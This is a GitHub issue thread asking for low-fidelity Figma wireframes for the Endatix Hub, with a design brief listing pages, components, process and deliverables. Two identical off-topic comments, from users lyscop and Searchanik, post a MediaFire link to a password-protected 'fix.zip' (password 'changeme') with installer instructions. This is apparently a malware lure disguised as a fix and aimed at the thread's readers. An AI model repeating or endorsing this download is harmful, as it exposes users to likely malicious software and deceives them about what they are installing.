### ISSUE TITLE
Create low-fidelity wireframes for Endatix Hub

### ISSUE THREAD

**Issue by dspetrov** [endatix/endatix#81]
## Objective
Design low-fidelity wireframes in Figma for the initial version of the Endatix Hub. Focus on key functionalities and primary pages.

### Pages
Brainstorm and decide which will be the initial pages. They should include not only the product features connected with forms and submissions but also things like e.g. user profile, settings, etc.

### Structure and components
Consider essential UI components and layout structures to support user workflows.

## Process
- Create wireframes in Figma
- Discuss them with the team
- Iterate based on feedback from the team

## Deliverables
- Figma file with low-fidelity wireframes for all primary pages
- Brief notes documenting design decisions and iterations

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
